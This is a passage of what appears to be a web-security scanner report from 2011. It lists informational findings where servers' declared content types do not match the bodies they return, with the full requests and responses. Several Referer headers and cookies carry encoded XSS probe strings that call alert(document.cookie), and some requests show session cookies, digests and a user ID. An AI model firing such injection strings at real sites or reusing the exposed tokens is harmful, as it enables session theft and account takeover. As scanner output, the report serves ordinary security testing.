{"adBuyOut":true,"cs_rwid":"4a2e9fce1f0e074b","cs_wid":"","feedAkHost":"community.parenthood.com","r":"kfl1-1","serverSideError":"","ssoLoginUrl":"","ssoRegisterUrl":"","widgetAkHost":"community.paren
...[SNIP]...

32.40. http://l.apture.com/v2/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v2/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v2/?1=%7B%22pageId%22%3A201236214%2C%22visitId%22%3A34736088960046%2C%22duration%22%3A2778658%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22referrer%22%3A%22http%3A%2F%2Fburp%2Fshow%2F35%22%2C%22quirks%22%3Anull%2C%22numTmmLinks%22%3A0%2C%22type%22%3A25%2C%22siteId%22%3A197235%7D HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Origin: http://starscene.dailystar.com.lb
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 24 Jan 2011 21:58:02 GMT

{}

32.41. http://mako.cc/projects/aub/COPYING

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mako.cc
Path:   /projects/aub/COPYING

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/COPYING HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:25 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "6447d-119-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 281
Connection: close
Content-Type: text/plain

This code is offered as-is. Anyone is welcome to use this program and
to make and distribute improvements, provided that the notice of
authorship is retained. I accept no responsibility for loss or
...[SNIP]...

32.42. http://mako.cc/projects/aub/docs/Introducing_AUB

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mako.cc
Path:   /projects/aub/docs/Introducing_AUB

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/docs/Introducing_AUB HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:32 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64480-6807-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 26631
Connection: close
Content-Type: text/plain


           The Introducing AUB Document


   1.    What is aub?

   More and more people are posting binary files to usenet these days.
Some of these binaries are executables and audio data; a majority seem to
be p
...[SNIP]...

32.43. http://mako.cc/projects/aub/docs/USAGE

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mako.cc
Path:   /projects/aub/docs/USAGE

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/docs/USAGE HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:34 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64481-a30-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 2608
Connection: close
Content-Type: text/plain


Command line options:

   aub -c        Catch up on all groups, but do not assemble binaries
   aub -n        No checkpointing; don't update aubrc
   aub -dN        Set debugging level to N (N > 0)
   aub -M        Print the aub
...[SNIP]...

32.44. https://maps-api-ssl.google.com/maps/api/js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://maps-api-ssl.google.com
Path:   /maps/api/js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 24 Jan 2011 22:40:52 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

32.45. http://maps.google.com/maps/api/js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.google.com
Path:   /maps/api/js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 24 Jan 2011 22:41:44 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

32.46. http://newsguy.com/user_info.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newsguy.com
Path:   /user_info.asp

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /user_info.asp?0.2662578278686851 HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Content-Length: 139
Expires: Mon, 24 Jan 2011 14:53:42 GMT
Cache-Control: no-cache
Content-Type: text/html


DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256
USERID=h02332
DNDDATA=200+6100000+0+0+2011012423+20110223+200+6100000+0+3050000
MAILDATA=

32.47. http://people.joomla.org/components/com_community/assets/group_thumb.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://people.joomla.org
Path:   /components/com_community/assets/group_thumb.png

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/png
The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /components/com_community/assets/group_thumb.png HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.2.10.1295967274; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:20 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 07:17:07 GMT
ETag: "29e8007-124d-494ada51962c0"
Accept-Ranges: bytes
Content-Length: 4685
Content-Type: image/png

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................@.@..
...[SNIP]...

32.48. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur

Summary

Severity:   Information
Confidence:   Firm
Host:   http://people.joomla.org
Path:   /plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.3.10.1295967274; __utmz=173056674.1295968217.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=173056674.779126497.1295968217.1295968217.1295968217.1; __utmc=173056674; __utmb=173056674.1.10.1295968217

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:24 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:38:08 GMT
ETag: "1988330-146-4906a9d5ea000"
Accept-Ranges: bytes
Content-Length: 326
Content-Type: text/plain

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...

32.49. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://people.joomla.org
Path:   /plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.2.10.1295967274; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:03 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:38:08 GMT
ETag: "198833a-14-4906a9d5ea000"
Accept-Ranges: bytes
Content-Length: 20
Content-Type: application/javascript

jQuery.noConflict();

32.50. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Ftweetmeme.com%2F&id=5c5c650d27&u=mozilla%2F5.0%20(windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us)%20applewebkit%2F534.10%20(khtml%2C%20like%20gecko)%20chrome%2F8.0.552.237%20safari%2F534.10&x=1295907703307&c=0&t=0&v=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
Content-Length: 867
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c361a3372a99df5c;path=/';
document.cookie = '__csv=286f8b371579253c;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('2d2e35941c7237e0'!='1')
...[SNIP]...

32.51. http://r.nexac.com/e/getdata.xgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The response contains the following Content-type statement:
  • Content-type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y;

Response

HTTP/1.1 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 24 Jan 2011 22:48:52 GMT
Server: lighttpd/1.4.18
Content-Length: 30

na_id=&na_mp=&na_mg=BR&na_da=

32.52. http://rt.disqus.com/forums/realtime-cached.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.disqus.com
Path:   /forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js HTTP/1.1
Host: rt.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 22:49:11 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

32.53. https://secure.disqus.com/embed/login.html

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.disqus.com
Path:   /embed/login.html

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /embed/login.html HTTP/1.1
Host: secure.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 BAD REQUEST
Server: nginx
Date: Mon, 24 Jan 2011 22:49:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie,Accept-Encoding
Content-Length: 19

Missing parameters.

32.54. http://spongecell.com/api/events/915725/buy_tickets

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spongecell.com
Path:   /api/events/915725/buy_tickets

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/events/915725/buy_tickets HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 500 Internal Server Error
Cache-Control: max-age=60
Content-Length: 23

No ticket url specified

32.55. http://spongecell.com/flash/download/264001/ad.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spongecell.com
Path:   /flash/download/264001/ad.swf

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-shockwave-flash
The response states that it contains a flash object. However, it actually appears to contain plain text.

Request

GET /flash/download/264001/ad.swf HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:24 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 8
Last-Modified: Fri, 21 Jan 2011 17:13:35 GMT
Connection: close
Accept-Ranges: bytes

disabled

32.56. http://static.fmpub.net/site/tweetmeme

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.fmpub.net
Path:   /site/tweetmeme

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /site/tweetmeme HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Fri, 07 Jan 2011 04:27:54 GMT
Accept-Ranges: bytes
X-Server: static1.chi.fmpub.net
Keep-Alive: timeout=120, max=734
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 2346
Content-Length: 3802

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.57. http://static.fmpub.net/zone/2671

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.fmpub.net
Path:   /zone/2671

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /zone/2671 HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Mon, 24 Jan 2011 05:10:36 GMT
Accept-Ranges: bytes
X-Server: static3.chi.fmpub.net
Keep-Alive: timeout=120, max=994
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 4613
Content-Length: 4819

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.58. http://static.fmpub.net/zone/2673

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.fmpub.net
Path:   /zone/2673

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /zone/2673 HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Mon, 24 Jan 2011 05:10:37 GMT
Accept-Ranges: bytes
X-Server: static2.chi.fmpub.net
Keep-Alive: timeout=120, max=879
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 4172
Content-Length: 4819

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.59. http://tweetmeme.s3.amazonaws.com/channel_thumbs/27.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tweetmeme.s3.amazonaws.com
Path:   /channel_thumbs/27.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /channel_thumbs/27.jpg HTTP/1.1
Host: tweetmeme.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: /rtg1AsDE1i/NmC0+CM0RKDAx7DFxblxhyXPOrhO1FB+5h/DMOpVcHMH7OqZQGU7
x-amz-request-id: ED6DE26DD317A690
Date: Mon, 24 Jan 2011 22:20:55 GMT
x-amz-meta-s3fox-filesize: 4461
x-amz-meta-s3fox-modifiedtime: 1255599239000
Last-Modified: Thu, 15 Oct 2009 09:35:23 GMT
ETag: "4e727bc898344515c2d3954519a628f7"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4461
Server: AmazonS3

GIF87ap.R.......L.L.....LtR ....R.............?.$D..\.X...,Fl.,..........T..i..$b........R,.........h.[...... :,YS<.Z................G.....9.................a..T.G......tuy..........g...............i
...[SNIP]...

32.60. http://urls.api.twitter.com/1/urls/count.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Mon, 24 Jan 2011 23:10:24 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

32.61. http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://users.tpg.com.au
Path:   /j_birch/plugins/superfish/changelog.txt

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /j_birch/plugins/superfish/changelog.txt HTTP/1.1
Host: users.tpg.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:10:37 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Sat, 26 Jul 2008 21:30:42 GMT
ETag: "fda65-1461-936480"
Accept-Ranges: bytes
Content-Length: 5217
Cache-Control: max-age=86400
Expires: Tue, 25 Jan 2011 23:10:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Changelog for Superfish - a jQuery menu plugin

v1.2.1:    altered 2nd July 07. added hide() before animate to make work for jQuery 1.1.3.

v1.2.2:    altered 2nd August 07. changed over function .find(
...[SNIP]...

32.62. http://venedet.michnica.net/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://venedet.michnica.net
Path:   /media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:28 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 11 Jan 2011 21:16:49 GMT
ETag: "cda0fc-36c85-499989a42f240"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...

32.63. http://venedet.michnica.net/templates/beez_20/fonts/TitilliumMaps29L002.otf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://venedet.michnica.net
Path:   /templates/beez_20/fonts/TitilliumMaps29L002.otf

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

